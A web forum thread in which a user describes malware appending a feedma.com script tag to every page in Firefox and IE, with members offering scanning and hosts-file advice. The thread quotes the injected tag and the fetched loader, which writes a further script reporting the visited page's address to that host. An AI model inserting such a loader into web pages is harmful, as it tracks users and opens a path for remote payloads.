Virus adds javascript to sites

  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

I've got a little problem. A virus, or some kind of malicious script is appending the following code to all the sites that Firefox and IE browse to. This does not occur with Chrome or Safari.

Code: [ Select ]
...</html>
<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>
  1. ...</html>
  2. <script type="text/javascript" src="http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>


I'm running NoScript on Firefox so it's being blocked, but I would very much like to remove it.

I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.

I know this probably isn't the best forum for this kind of problem, but I thought you might have a good idea about the files that might be affected and I can repair.
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

Does it always add it to the cgi-bin directory?
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages I view.

This very page I've right clicked -> View Source, and it's the same as above - the extra line is at the very end.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Posts: 2733
  • Loc: Nashville, TN

Post 3+ Months Ago

Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

UPSGuy wrote:
Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.

alex89 wrote:
I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.


But thanks for helping :roll: :P
  • Bigwebmaster
  • Site Admin
  • Site Admin
  • User avatar
  • Posts: 9092
  • Loc: Seattle, WA & Phoenix, AZ

Post 3+ Months Ago

Try running Malwarebytes Anti-Malware. That program seems to catch things many others don't find. Once you download it make sure you run the update program within it so that you have the latest database update.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

Thanks for the advice :) I had mbam in my downloads folder, never installed.

Starting a full scan of drives C, D, E, F, G, H, J and I. Only 4tbs to go.

Edit: 9 objects infected already. Yay!
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13504
  • Loc: Florida

Post 3+ Months Ago

In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Posts: 2733
  • Loc: Nashville, TN

Post 3+ Months Ago

Good call joebert. I forget about this, but I use my hosts as a cross-browser ad blocker since I swap around a lot. This site has a list that's updated pretty often.

@alex
Quote:
Be sure to run your AV/malware/spyware
:P ;)
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

joebert wrote:
In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)

@UPSGuy

My most sincere apologies :P (Don't worry, I've got plans to make one that scans all 3 instantly with a 100% success rate)

13 objects found after 12 minutes of scanning. Should have got a mac.
  • grinch2171
  • Moderator
  • Genius
  • User avatar
  • Posts: 6810
  • Loc: Martinsburg, WV

Post 3+ Months Ago

alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PC's and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something not Microsoft.
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Posts: 5149
  • Loc: SC-USA

Post 3+ Months Ago

alex89 wrote:
... Should have got a mac.


Naw, stick with computers. :)
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13504
  • Loc: Florida

Post 3+ Months Ago

alex89 wrote:
joebert wrote:
In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)


I love it when people get cocky and end up with VIRUSES ON THEIR COMPUTER because they don't want to listen. ;)

Noscript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates ?

What I want to know, is how is this thing making that line show up in the HTML source you're viewing ?
Are you sure you're not going through a proxy that's adding it or something ?

I would think that if something's hijacking the page inbetween the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Posts: 5149
  • Loc: SC-USA

Post 3+ Months Ago

Don2007 wrote:
Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?


I think Alex meant it was a directory site. As in a link exchange directory kind of thing(I'm not going to look, personally). The URL is for THEIR cgi-bin. The virus is inserting that snippet into all the sites he views.
  • Don2007
  • Web Master
  • Web Master
  • Don2007
  • Posts: 4924
  • Loc: NY

Post 3+ Months Ago

No, he said to all the pages of the feedma site, not all sites.
  • ATNO/TW
  • Super Moderator
  • Super Moderator
  • User avatar
  • Posts: 23455
  • Loc: Woodbridge VA

Post 3+ Months Ago

Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


What's up with that?
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Posts: 239
  • Loc: Western Australia

Post 3+ Months Ago

grinch2171 wrote:
alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PC's and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something not Microsoft.


Moderate trolling is successful. :P

I'm well aware that it's my fault this happened, I'm just kidding. Although I do respect macs for some of their traits (interface design especially).

joebert wrote:
Noscript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates ?

What I want to know, is how is this thing making that line show up in the HTML source you're viewing ?
Are you sure you're not going through a proxy that's adding it or something ?

I would think that if something's hijacking the page inbetween the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:


IE isn't running, and there aren't any processes running that I don't know exactly what they do. (I like to run a tight ship - no extra services/startup/processes than necessary)

That's what I thought as well, but it definitely didn't occur in Safari or Chrome. It's odd. No proxy.

digitalMedia wrote:
The virus is inserting that snippet into all the sites he views.


Yeah you're right. Sorry if I was unclear Don.

ATNO/TW wrote:
Did anyone download http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113} ?

It yields:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


What's up with that?


If it's the top frame, add that script again? Wouldn't it loop? I don't know. I think it's probably more for tracking than ads or something malicious. Feel free to correct me if I'm wrong.

Good news though - I left a few scanners on last night, and it isn't happening any more. Had to restart to remove/repair a DLL, I think that was probably it. Does anyone know of a DLL that IE and FF share? I wish I knew more about this kind of thing.

But thanks for all the responses :)

Post Information

  • Total Posts in this topic: 18 posts
  • Users browsing this forum: No registered users and 40 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
cron
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.